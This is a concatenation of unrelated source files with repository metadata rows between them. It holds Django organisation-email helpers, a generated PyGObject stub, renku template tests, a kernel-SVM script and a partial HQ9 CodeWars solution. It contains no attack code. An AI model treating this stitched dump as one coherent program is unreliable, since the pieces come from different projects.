    # CC the organisation's own mailbox when one is configured.
    carbon_copies = [organisation.email] if organisation.email else []
    message = template.send(linked_user.email, cc=carbon_copies, context=context)
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, linked_user, sender=acting_user)
def send_organisation_contact_adminuser_email_notification(linked_user, linked_by, organisation, request):
    """Email *linked_user* that they were given the Company Admin role."""
    template = OrganisationContactAdminUserNotificationEmail()
    context = {
        'user': linked_user,
        'linked_by': linked_by,
        'organisation': organisation,
    }
    # CC the organisation's own mailbox when one is configured.
    carbon_copies = [organisation.email] if organisation.email else []
    message = template.send(linked_user.email, cc=carbon_copies, context=context)
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, linked_user, sender=acting_user)
def send_organisation_link_email_notification(linked_user, linked_by, organisation, request):
    """Email *linked_user* confirming their account was linked to *organisation*."""
    template = OrganisationLinkNotificationEmail()
    context = {
        'user': linked_user,
        'linked_by': linked_by,
        'organisation': organisation,
    }
    # CC the organisation's own mailbox when one is configured.
    carbon_copies = [organisation.email] if organisation.email else []
    message = template.send(linked_user.email, cc=carbon_copies, context=context)
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, linked_user, sender=acting_user)
def send_organisation_request_email_notification(org_request, request, contact):
    """Notify *contact* that an organisation request awaits internal approval.

    Builds a link to the internal access page, rewriting the host to the
    '-internal' site when the request did not already come through it.
    """
    email = OrganisationRequestNotificationEmail()
    url = request.build_absolute_uri('/internal/organisations/access/{}'.format(org_request.id))
    if "-internal" not in url:
        # Rebuild the URL on the internal host:
        # scheme://<SITE_PREFIX>-internal.<SITE_DOMAIN><path>.
        url = "{0}://{1}{2}.{3}{4}".format(request.scheme, settings.SITE_PREFIX, '-internal', settings.SITE_DOMAIN,
            url.split(request.get_host())[1])
    context = {
        'request': request.data,
        'url': url,
    }
    msg = email.send(contact, context=context)
    sender = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(msg, org_request, request.user, sender=sender)
def send_organisation_unlink_email_notification(unlinked_user, unlinked_by, organisation, request):
    """Email *unlinked_user* that *unlinked_by* removed them from *organisation*."""
    template = OrganisationUnlinkNotificationEmail()
    context = {
        'user': unlinked_user,
        'unlinked_by': unlinked_by,
        'organisation': organisation,
    }
    # CC the organisation's own mailbox when one is configured.
    carbon_copies = [organisation.email] if organisation.email else []
    message = template.send(unlinked_user.email, cc=carbon_copies, context=context)
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_email(message, organisation, unlinked_user, sender=acting_user)
def send_organisation_request_accept_email_notification(org_request, organisation, request):
    """Tell the requester their organisation request was accepted."""
    template = OrganisationRequestAcceptNotificationEmail()
    message = template.send(org_request.requester.email, context={'request': org_request})
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    # Record the email against both the request and the new organisation.
    _log_org_request_email(message, org_request, sender=acting_user)
    _log_org_email(message, organisation, org_request.requester, sender=acting_user)
def send_org_access_group_request_accept_email_notification(org_request, request, recipient_list):
    """Notify the access group (``recipient_list``) of a new organisation request.

    Builds a link to the internal access page, rewriting the domain to the
    '-internal' variant when the request did not come through it.
    """
    email = OrganisationAccessGroupRequestAcceptNotificationEmail()
    url = request.build_absolute_uri('/internal/organisations/access/{}'.format(org_request.id))
    if "-internal" not in url:
        # Splice '-internal.<SITE_DOMAIN>' in place of '.<SITE_DOMAIN>'.
        url = '-internal.{}'.format(settings.SITE_DOMAIN).join(url.split('.' + settings.SITE_DOMAIN))
    context = {
        'name': request.data.get('name'),
        'abn': request.data.get('abn'),
        'url': url,
    }
    msg = email.send(recipient_list, context=context)
    sender = request.user if request else settings.DEFAULT_FROM_EMAIL
    _log_org_request_email(msg, org_request, sender=sender)
    # commenting out because Organisation does not yet exist - only OrganisationRequest exists
    #_log_org_email(msg, organisation, org_request.requester, sender=sender)
def send_organisation_request_decline_email_notification(org_request, request):
    """Tell the requester their organisation request was declined."""
    template = OrganisationRequestDeclineNotificationEmail()
    message = template.send(org_request.requester.email, context={'request': org_request})
    acting_user = request.user if request else settings.DEFAULT_FROM_EMAIL
    # Only the request log is written: no Organisation exists for a declined request.
    _log_org_request_email(message, org_request, sender=acting_user)
def send_organisation_address_updated_email_notification(address_updated_by,ledger_organisation,wc_organisation,request):
    """Email every admin contact of *wc_organisation* that its address changed.

    ``ledger_organisation`` supplies the display data for the template;
    ``wc_organisation`` selects the admin contacts to notify.
    """
    # Local import avoids a circular dependency with the models module.
    from commercialoperator.components.organisations.models import OrganisationContact
    email = OrganisationAddressUpdatedNotificationEmail()
    context = {
        'address_updated_by': address_updated_by,
        'organisation': ledger_organisation
    }
    for org_contact in OrganisationContact.objects.filter(user_role='organisation_admin',organisation=wc_organisation):
        msg = email.send(org_contact.email, context=context)
        # NOTE(review): ``msg`` and ``sender`` are computed but never used —
        # this looks like a missing ``_log_org_email`` call; confirm intent
        # before changing behaviour. ``sender`` is also loop-invariant.
        sender = request.user if request else settings.DEFAULT_FROM_EMAIL
def _log_org_request_email(email_message, request, sender=None):
    """Persist *email_message* as an OrganisationRequestLogEntry for *request*.

    Accepts either a Django email object (whose subject/body/recipients are
    extracted) or any other value, which is logged as plain text addressed to
    the request's requester. Returns the created log entry.
    """
    # Local import avoids a circular dependency with the models module.
    from commercialoperator.components.organisations.models import OrganisationRequestLogEntry
    if isinstance(email_message, (EmailMultiAlternatives, EmailMessage,)):
        # TODO this will log the plain text body, should we log the html instead
        text = email_message.body
        subject = email_message.subject
        fromm = smart_text(sender) if sender else smart_text(email_message.from_email)
        # the to email is normally a list
        if isinstance(email_message.to, list):
            to = ','.join(email_message.to)
        else:
            to = smart_text(email_message.to)
        # we log the cc and bcc in the same cc field of the log entry as a ',' comma separated string
        all_ccs = []
        if email_message.cc:
            all_ccs += list(email_message.cc)
        if email_message.bcc:
            all_ccs += list(email_message.bcc)
        all_ccs = ','.join(all_ccs)
    else:
        # Non-email payloads are stringified and attributed to the requester.
        text = smart_text(email_message)
        subject = ''
        to = request.requester.email
        fromm = smart_text(sender) if sender else SYSTEM_NAME
        all_ccs = ''
    customer = request.requester
    staff = sender
    kwargs = {
        'subject': subject,
        'text': text,
        'request': request,
        'customer': customer,
        'staff': staff,
        'to': to,
        'fromm': fromm,
        'cc': all_ccs
    }
    email_entry = OrganisationRequestLogEntry.objects.create(**kwargs)
    return email_entry
def _log_org_email(email_message, organisation, customer, sender=None):
    """Persist *email_message* as an OrganisationLogEntry for *organisation*.

    Accepts either a Django email object (whose subject/body/recipients are
    extracted) or any other value, which is logged as plain text addressed to
    *customer*. Returns the created log entry.
    """
    # Local import avoids a circular dependency with the models module.
    from commercialoperator.components.organisations.models import OrganisationLogEntry
    if isinstance(email_message, (EmailMultiAlternatives, EmailMessage,)):
        # TODO this will log the plain text body, should we log the html instead
        text = email_message.body
        subject = email_message.subject
        fromm = smart_text(sender) if sender else smart_text(email_message.from_email)
        # the to email is normally a list
        if isinstance(email_message.to, list):
            to = ','.join(email_message.to)
        else:
            to = smart_text(email_message.to)
        # we log the cc and bcc in the same cc field of the log entry as a ',' comma separated string
        all_ccs = []
        if email_message.cc:
            all_ccs += list(email_message.cc)
        if email_message.bcc:
            all_ccs += list(email_message.bcc)
        all_ccs = ','.join(all_ccs)
    else:
        text = smart_text(email_message)
        subject = ''
        # BUG FIX: the original read ``request.requester.email`` here, but no
        # ``request`` name exists in this function's scope, so logging a plain
        # string raised NameError. Use the ``customer`` argument instead,
        # mirroring _log_org_request_email's use of its own request source.
        to = customer.email
        fromm = smart_text(sender) if sender else SYSTEM_NAME
        all_ccs = ''
    staff = sender
    kwargs = {
        'subject': subject,
        'text': text,
        'organisation': organisation,
        'customer': customer,
        'staff': staff,
        'to': to,
        'fromm': fromm,
        'cc': all_ccs
    }
    email_entry = OrganisationLogEntry.objects.create(**kwargs)
    return email_entry
| [
"[email protected]"
] | |
7263a68d87f21b4ea91d391b6d4f9ed8b297e855 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Clutter/TextPrivate.py | b4fbac1eab470075b4b2e86eeac89087a5a7d5ff | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,373 | py | # encoding: utf-8
# module gi.repository.Clutter
# from /usr/lib64/girepository-1.0/Clutter-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
import gi.overrides.GObject as __gi_overrides_GObject
import gi.repository.Atk as __gi_repository_Atk
import gi.repository.GObject as __gi_repository_GObject
import gobject as __gobject
class TextPrivate(__gi.Struct):
    """Opaque private-data struct for Clutter.Text.

    Auto-generated stub (per the module header: produced by generator 1.147
    from the Clutter-1.0 typelib). The struct's fields are not introspected,
    so only default object-protocol methods with unknown real signatures are
    exposed; do not edit by hand.
    """
    # no doc
    def __delattr__(self, *args, **kwargs): # real signature unknown
        """ Implement delattr(self, name). """
        pass
    def __dir__(self, *args, **kwargs): # real signature unknown
        """ Default dir() implementation. """
        pass
    def __eq__(self, *args, **kwargs): # real signature unknown
        """ Return self==value. """
        pass
    def __format__(self, *args, **kwargs): # real signature unknown
        """ Default object formatter. """
        pass
    def __getattribute__(self, *args, **kwargs): # real signature unknown
        """ Return getattr(self, name). """
        pass
    def __ge__(self, *args, **kwargs): # real signature unknown
        """ Return self>=value. """
        pass
    def __gt__(self, *args, **kwargs): # real signature unknown
        """ Return self>value. """
        pass
    def __hash__(self, *args, **kwargs): # real signature unknown
        """ Return hash(self). """
        pass
    def __init_subclass__(self, *args, **kwargs): # real signature unknown
        """
        This method is called when a class is subclassed.
        The default implementation does nothing. It may be
        overridden to extend subclasses.
        """
        pass
    def __init__(self, *args, **kwargs): # real signature unknown
        pass
    def __le__(self, *args, **kwargs): # real signature unknown
        """ Return self<=value. """
        pass
    def __lt__(self, *args, **kwargs): # real signature unknown
        """ Return self<value. """
        pass
    @staticmethod # known case of __new__
    def __new__(*args, **kwargs): # real signature unknown
        """ Create and return a new object. See help(type) for accurate signature. """
        pass
    def __ne__(self, *args, **kwargs): # real signature unknown
        """ Return self!=value. """
        pass
    def __reduce_ex__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass
    def __reduce__(self, *args, **kwargs): # real signature unknown
        """ Helper for pickle. """
        pass
    def __repr__(self, *args, **kwargs): # real signature unknown
        """ Return repr(self). """
        pass
    def __setattr__(self, *args, **kwargs): # real signature unknown
        """ Implement setattr(self, name, value). """
        pass
    def __sizeof__(self, *args, **kwargs): # real signature unknown
        """ Size of object in memory, in bytes. """
        pass
    def __str__(self, *args, **kwargs): # real signature unknown
        """ Return str(self). """
        pass
    def __subclasshook__(self, *args, **kwargs): # real signature unknown
        """
        Abstract classes can override this to customize issubclass().
        This is invoked early on by abc.ABCMeta.__subclasscheck__().
        It should return True, False or NotImplemented. If it returns
        NotImplemented, the normal algorithm is used. Otherwise, it
        overrides the normal algorithm (and the outcome is cached).
        """
        pass
    def __weakref__(self, *args, **kwargs): # real signature unknown
        pass
    __class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
    __dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(TextPrivate), '__module__': 'gi.repository.Clutter', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'TextPrivate' objects>, '__weakref__': <attribute '__weakref__' of 'TextPrivate' objects>, '__doc__': None})"
    __gtype__ = None # (!) real value is '<GType void (4)>'
    __info__ = StructInfo(TextPrivate)
| [
"[email protected]"
] | |
f44499d267dd8e234c6c753a888ab64ee817e509 | d63c4b9e05638d6abb68333edf43936134b97570 | /tests/core/models/test_template.py | 981933fcd9a8e20f4d54ca7c320469541ac33f2a | [
"Apache-2.0",
"Python-2.0"
] | permissive | SwissDataScienceCenter/renku-python | 316dc83646e9014803dff268438d34e844ba0b54 | e0ff587f507d049eeeb873e8488ba8bb10ac1a15 | refs/heads/develop | 2023-08-31T20:33:09.342385 | 2023-08-24T08:15:46 | 2023-08-24T08:15:46 | 100,947,017 | 30 | 25 | Apache-2.0 | 2023-09-12T21:52:34 | 2017-08-21T11:49:21 | Python | UTF-8 | Python | false | false | 9,532 | py | #
# Copyright 2019-2023 - Swiss Data Science Center (SDSC)
# A partnership between École Polytechnique Fédérale de Lausanne (EPFL) and
# Eidgenössische Technische Hochschule Zürich (ETHZ).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Template tests."""
import textwrap
import pytest
from renku.core import errors
from renku.core.util.metadata import read_renku_version_from_dockerfile
from renku.domain_model.template import TemplateMetadata, TemplateParameter, TemplatesManifest
TEMPLATE_METADATA = {"__name__": "my-project", "__project_description__": "My Project", "__renku_version__": "42.0.0"}
def test_template_get_files(source_template):
    """Test listing the files provided by a template."""
    # ``source_template`` is a project-provided pytest fixture — presumably a
    # Template over the test template directory; verify against conftest.
    files = set(source_template.get_files())
    assert {
        ".gitignore",
        ".renku/renku.ini",
        "Dockerfile",
        "README.md",
        "{{ __name__ }}.dummy",
        "requirements.txt",
        "immutable.file",
    } == files
def test_template_render(source_template):
    """Test rendering a template substitutes metadata into its files."""
    rendered_template = source_template.render(metadata=TemplateMetadata.from_dict(TEMPLATE_METADATA))
    assert "A Renku project: My Project\n" == (rendered_template.path / "README.md").read_text()
    assert "42.0.0" == str(read_renku_version_from_dockerfile(rendered_template.path / "Dockerfile"))
@pytest.mark.parametrize("name", ["", "a-renku-project"])
def test_template_render_with_templated_filename(source_template, name):
    """Test rendering a template with templated filenames."""
    # The '{{ __name__ }}.dummy' source file must be renamed per project name,
    # including the empty-name edge case ('.dummy').
    rendered_template = source_template.render(metadata=TemplateMetadata.from_dict({"__name__": name}))
    assert (rendered_template.path / f"{name}.dummy").exists()
def test_template_get_rendered_files(source_template):
    """Test listing the files of a rendered template."""
    rendered_template = source_template.render(metadata=TemplateMetadata.from_dict(TEMPLATE_METADATA))
    assert {
        ".gitignore",
        ".renku/renku.ini",
        "Dockerfile",
        "README.md",
        "my-project.dummy",
        "requirements.txt",
        "immutable.file",
    } == set(rendered_template.get_files())
def test_templates_manifest():
    """Test creating a template manifest from YAML content."""
    # Two templates: 'python' (via the legacy 'folder' key, no variables) and
    # 'R' (via 'id', with aliases and one typed variable).
    manifest = TemplatesManifest.from_string(
        textwrap.dedent(
            """
            - folder: python
              name: Python Project
              description: A Python-based Renku project
              variables: {}
              icon: python.png
            - id: R
              aliases: ["R-minimal", "R-base"]
              name: R Project
              description: An R-based Renku project
              variables:
                rate:
                  type: number
                  description: sample rate
              icon: R.png
            """
        )
    )
    assert 2 == len(manifest.templates)
    template = next(t for t in manifest.templates if t.id == "python")
    assert [] == template.aliases
    assert "Python Project" == template.name
    assert "A Python-based Renku project" == template.description
    assert "python.png" == template.icon
    assert [] == template.parameters
    template = next(t for t in manifest.templates if t.id == "R")
    assert ["R-minimal", "R-base"] == template.aliases
    assert "R Project" == template.name
    assert "An R-based Renku project" == template.description
    assert "R.png" == template.icon
    assert 1 == len(template.parameters)
    assert "rate" == template.parameters[0].name
    assert "number" == template.parameters[0].type
    assert "sample rate" == template.parameters[0].description
def test_templates_manifest_non_existing_file():
    """Test creating a template manifest from a non-existing file."""
    with pytest.raises(errors.InvalidTemplateError, match="There is no manifest file 'non-existing-path'"):
        TemplatesManifest.from_path("non-existing-path")
def test_templates_manifest_binary_content(tmp_path):
    """Test creating a template manifest from a non-text file."""
    path = tmp_path / "manifest.yaml"
    path.write_bytes(b"\x80")  # NOTE: Write an invalid unicode sequence
    with pytest.raises(errors.InvalidTemplateError, match="Cannot read manifest file.*manifest.yaml"):
        TemplatesManifest.from_path(path)
def test_templates_manifest_invalid_yaml(tmp_path):
    """Test creating a template manifest from invalid YAML content."""
    # NOTE(review): ``tmp_path`` is unused — the manifest is parsed from a string.
    with pytest.raises(errors.InvalidTemplateError, match="Cannot parse manifest file"):
        TemplatesManifest.from_string("- id: python\nid")
@pytest.mark.parametrize(
    "content, message",
    [
        ("", "Cannot find any valid template in manifest file"),
        ("id: python", "Invalid manifest content type: 'dict'"),
        ("-\n - id: python", "Invalid template type: 'list'"),
        ("- no-id: python", "Template doesn't have an id:"),
        ("- id: python\n variables: p1", "Invalid template variable type on template 'python': 'str'"),
        ("- id: python\n variables:\n p1: 42", "Invalid parameter type 'int' for 'p1'"),
        ("- id: python\n name: Python\n aliases: [R]\n- id: R\n name: R\n", "Found duplicate IDs or aliases: 'R'"),
    ],
)
def test_templates_manifest_invalid_content(tmp_path, content, message):
    """Test creating a template manifest from invalid content raises with the expected message."""
    # NOTE(review): ``tmp_path`` is unused — the manifest is parsed from a string.
    with pytest.raises(errors.InvalidTemplateError, match=message):
        TemplatesManifest.from_string(content)
def test_templates_manifest_warnings(tmp_path):
    """Test parsing deprecated manifest constructs produces validation warnings."""
    # NOTE(review): ``tmp_path`` is unused — the manifest is parsed from a string.
    # 'folder' and string-valued variables are the deprecated forms under test.
    content = "- folder: python\n  name: python\n  variables:\n    p1: My parameter"
    manifest = TemplatesManifest.from_string(content, skip_validation=True)
    warnings = manifest.validate()
    assert "Template 'python' should use 'id' attribute instead of 'folder'." in warnings
    assert (
        "Template 'python' variable 'p1' uses old string format in manifest and should be replaced"
        " with the nested dictionary format."
    ) in warnings
@pytest.mark.parametrize("default, has_default", [(None, False), (42, True), ("", True), (False, True)])
def test_template_parameter_default_value(default, has_default):
    """Test a parameter has no default only when the default is None."""
    parameter = TemplateParameter(name="parameter", description="", type="", default=default, possible_values=None)
    parameter.validate()
    assert default == parameter.default
    # Falsy defaults ("" / False) still count as defaults; only None means "no default".
    assert parameter.has_default is has_default
@pytest.mark.parametrize(
    "value, message",
    [
        ({"type": "int"}, "Template contains variable .* of type 'int' which is not supported"),
        ({"possible_values": "42"}, "Invalid type for possible values of template variable"),
        ({"type": "enum"}, "Template variable 'parameter' of type enum does not provide a corresponding enum list"),
        ({"type": "number", "default_value": "true"}, "Invalid default value for 'parameter':"),
    ],
)
def test_template_parameter_validation(value, message):
    """Test TemplateParameter validation rejects malformed variable specs."""
    with pytest.raises(errors.InvalidTemplateError, match=message):
        parameter = TemplateParameter.from_dict(name="parameter", value=value)
        parameter.validate()
@pytest.mark.parametrize(
    "type, possible_values, value, expected_value, expected_type",
    [
        (None, None, "truE", "truE", str),
        (None, None, True, True, bool),
        (None, None, 42, 42, int),
        (None, None, None, None, type(None)),
        ("boolean", None, "true", True, bool),
        ("boolean", None, True, True, bool),
        ("boolean", None, "False", False, bool),
        ("number", None, 42, 42, int),
        ("number", None, "42", 42, int),
        ("number", None, "42.0", 42, float),
        ("string", None, "", "", str),
        ("string", None, "some value", "some value", str),
        ("enum", ["1", "2", "3"], "2", "2", str),
    ],
)
def test_template_parameter_value_conversion(type, possible_values, value, expected_value, expected_type):
    """Test TemplateParameter value conversion for each declared type."""
    # NOTE(review): the parametrized name ``type`` shadows the builtin inside this test.
    parameter = TemplateParameter.from_dict(name="parameter", value={"type": type, "possible_values": possible_values})
    converted_value = parameter.convert(value)
    assert expected_value == converted_value
    assert expected_type == converted_value.__class__
@pytest.mark.parametrize(
    "type, possible_values, value",
    [
        ("boolean", None, "TRUE"),
        ("boolean", None, 42),
        ("boolean", None, ""),
        ("number", None, "42.0f"),
        ("string", None, 42),
        ("enum", ["1", "2", "3"], "42"),
    ],
)
def test_template_parameter_value_conversion_error(type, possible_values, value):
    """Test TemplateParameter conversion rejects invalid values."""
    parameter = TemplateParameter.from_dict(name="parameter", value={"type": type, "possible_values": possible_values})
    with pytest.raises(ValueError, match=f"Invalid value '{value}.*' for template variable 'parameter.*'"):
        parameter.convert(value)
| [
"[email protected]"
] | |
87db130e21a172d48ce24cd1480dd27f518ba1f0 | 8313b823a755694cfd71e57ad63760ba1c7009d4 | /Classification/kernal_SVM.py | adcd73f8c99e84b0ddc56f69991b888dba8e9c20 | [] | no_license | KRBhavaniSankar/Machine-Learning | 49063374a8b243563212cf52a933da03b41bb576 | 339f146362aa5960794d8ddcef50d502955c24c4 | refs/heads/master | 2021-06-07T17:09:57.259971 | 2020-02-18T13:40:03 | 2020-02-18T13:40:03 | 143,809,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,638 | py | # Kernal-SVM Classification
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, [2, 3]].values
y = dataset.iloc[:, 4].values
# Splitting the dataset into the Training set and Test set
from sklearn.cross_validation import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.25, random_state = 0)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
# Fitting classifier to the Training set
from sklearn.svm import SVC
classifier = SVC(kernel="rbf",random_state=0)
classifier.fit(X_train,y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
# Visualising the Training set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_train, y_train
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Kernal-SVM Classifier (Training set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show()
# Visualising the Test set results
from matplotlib.colors import ListedColormap
X_set, y_set = X_test, y_test
X1, X2 = np.meshgrid(np.arange(start = X_set[:, 0].min() - 1, stop = X_set[:, 0].max() + 1, step = 0.01),
np.arange(start = X_set[:, 1].min() - 1, stop = X_set[:, 1].max() + 1, step = 0.01))
plt.contourf(X1, X2, classifier.predict(np.array([X1.ravel(), X2.ravel()]).T).reshape(X1.shape),
alpha = 0.75, cmap = ListedColormap(('red', 'green')))
plt.xlim(X1.min(), X1.max())
plt.ylim(X2.min(), X2.max())
for i, j in enumerate(np.unique(y_set)):
plt.scatter(X_set[y_set == j, 0], X_set[y_set == j, 1],
c = ListedColormap(('red', 'green'))(i), label = j)
plt.title('Kernal-SVM Classifier (Test set)')
plt.xlabel('Age')
plt.ylabel('Estimated Salary')
plt.legend()
plt.show() | [
"[email protected]"
] | |
5feaa7de4cb28d27aa5cf50cc0daa4d89a2fed56 | a590cb0c9b232ad98d17a9917a36930c6a2c03f8 | /8kyu/8kyu interpreters HQ9.py | b0236dc360274759dbaabb6e495a1fd40a998e01 | [] | no_license | AbbyGeek/CodeWars | 6e10c10cbdb11f2df17a657d11ff5ffa79a5fb0b | 64dddda9f2a14a0592cc946b35302c4bd9bc569e | refs/heads/master | 2020-12-21T00:14:53.665879 | 2020-01-26T01:16:41 | 2020-01-26T01:16:41 | 236,252,030 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,148 | py | def HQ9(code):
if "9" in code:
return "99 bottles of beer on the wall, 99 bottles of beer.\nTake one down and pass it around, 98 bottles of beer on the wall.\n98 bottles of beer on the wall, 98 bottles of beer.\nTake one down and pass it around, 97 bottles of beer on the wall.\n97 bottles of beer on the wall, 97 bottles of beer.\nTake one down and pass it around, 96 bottles of beer on the wall.\n96 bottles of beer on the wall, 96 bottles of beer.\nTake one down and pass it around, 95 bottles of beer on the wall.\n95 bottles of beer on the wall, 95 bottles of beer.\nTake one down and pass it around, 94 bottles of beer on the wall.\n94 bottles of beer on the wall, 94 bottles of beer.\nTake one down and pass it around, 93 bottles of beer on the wall.\n93 bottles of beer on the wall, 93 bottles of beer.\nTake one down and pass it around, 92 bottles of beer on the wall.\n92 bottles of beer on the wall, 92 bottles of beer.\nTake one down and pass it around, 91 bottles of beer on the wall.\n91 bottles of beer on the wall, 91 bottles of beer.\nTake one down and pass it around, 90 bottles of beer on the wall.\n90 bottles of beer on the wall, 90 bottles of beer.\nTake one down and pass it around, 89 bottles of beer on the wall.\n89 bottles of beer on the wall, 89 bottles of beer.\nTake one down and pass it around, 88 bottles of beer on the wall.\n88 bottles of beer on the wall, 88 bottles of beer.\nTake one down and pass it around, 87 bottles of beer on the wall.\n87 bottles of beer on the wall, 87 bottles of beer.\nTake one down and pass it around, 86 bottles of beer on the wall.\n86 bottles of beer on the wall, 86 bottles of beer.\nTake one down and pass it around, 85 bottles of beer on the wall.\n85 bottles of beer on the wall, 85 bottles of beer.\nTake one down and pass it around, 84 bottles of beer on the wall.\n84 bottles of beer on the wall, 84 bottles of beer.\nTake one down and pass it around, 83 bottles of beer on the wall.\n83 bottles of beer on the wall, 83 bottles of beer.\nTake one down and 
pass it around, 82 bottles of beer on the wall.\n82 bottles of beer on the wall, 82 bottles of beer.\nTake one down and pass it around, 81 bottles of beer on the wall.\n81 bottles of beer on the wall, 81 bottles of beer.\nTake one down and pass it around, 80 bottles of beer on the wall.\n80 bottles of beer on the wall, 80 bottles of beer.\nTake one down and pass it around, 79 bottles of beer on the wall.\n79 bottles of beer on the wall, 79 bottles of beer.\nTake one down and pass it around, 78 bottles of beer on the wall.\n78 bottles of beer on the wall, 78 bottles of beer.\nTake one down and pass it around, 77 bottles of beer on the wall.\n77 bottles of beer on the wall, 77 bottles of beer.\nTake one down and pass it around, 76 bottles of beer on the wall.\n76 bottles of beer on the wall, 76 bottles of beer.\nTake one down and pass it around, 75 bottles of beer on the wall.\n75 bottles of beer on the wall, 75 bottles of beer.\nTake one down and pass it around, 74 bottles of beer on the wall.\n74 bottles of beer on the wall, 74 bottles of beer.\nTake one down and pass it around, 73 bottles of beer on the wall.\n73 bottles of beer on the wall, 73 bottles of beer.\nTake one down and pass it around, 72 bottles of beer on the wall.\n72 bottles of beer on the wall, 72 bottles of beer.\nTake one down and pass it around, 71 bottles of beer on the wall.\n71 bottles of beer on the wall, 71 bottles of beer.\nTake one down and pass it around, 70 bottles of beer on the wall.\n70 bottles of beer on the wall, 70 bottles of beer.\nTake one down and pass it around, 69 bottles of beer on the wall.\n69 bottles of beer on the wall, 69 bottles of beer.\nTake one down and pass it around, 68 bottles of beer on the wall.\n68 bottles of beer on the wall, 68 bottles of beer.\nTake one down and pass it around, 67 bottles of beer on the wall.\n67 bottles of beer on the wall, 67 bottles of beer.\nTake one down and pass it around, 66 bottles of beer on the wall.\n66 bottles of beer on the 
wall, 66 bottles of beer.\nTake one down and pass it around, 65 bottles of beer on the wall.\n65 bottles of beer on the wall, 65 bottles of beer.\nTake one down and pass it around, 64 bottles of beer on the wall.\n64 bottles of beer on the wall, 64 bottles of beer.\nTake one down and pass it around, 63 bottles of beer on the wall.\n63 bottles of beer on the wall, 63 bottles of beer.\nTake one down and pass it around, 62 bottles of beer on the wall.\n62 bottles of beer on the wall, 62 bottles of beer.\nTake one down and pass it around, 61 bottles of beer on the wall.\n61 bottles of beer on the wall, 61 bottles of beer.\nTake one down and pass it around, 60 bottles of beer on the wall.\n60 bottles of beer on the wall, 60 bottles of beer.\nTake one down and pass it around, 59 bottles of beer on the wall.\n59 bottles of beer on the wall, 59 bottles of beer.\nTake one down and pass it around, 58 bottles of beer on the wall.\n58 bottles of beer on the wall, 58 bottles of beer.\nTake one down and pass it around, 57 bottles of beer on the wall.\n57 bottles of beer on the wall, 57 bottles of beer.\nTake one down and pass it around, 56 bottles of beer on the wall.\n56 bottles of beer on the wall, 56 bottles of beer.\nTake one down and pass it around, 55 bottles of beer on the wall.\n55 bottles of beer on the wall, 55 bottles of beer.\nTake one down and pass it around, 54 bottles of beer on the wall.\n54 bottles of beer on the wall, 54 bottles of beer.\nTake one down and pass it around, 53 bottles of beer on the wall.\n53 bottles of beer on the wall, 53 bottles of beer.\nTake one down and pass it around, 52 bottles of beer on the wall.\n52 bottles of beer on the wall, 52 bottles of beer.\nTake one down and pass it around, 51 bottles of beer on the wall.\n51 bottles of beer on the wall, 51 bottles of beer.\nTake one down and pass it around, 50 bottles of beer on the wall.\n50 bottles of beer on the wall, 50 bottles of beer.\nTake one down and pass it around, 49 bottles of beer 
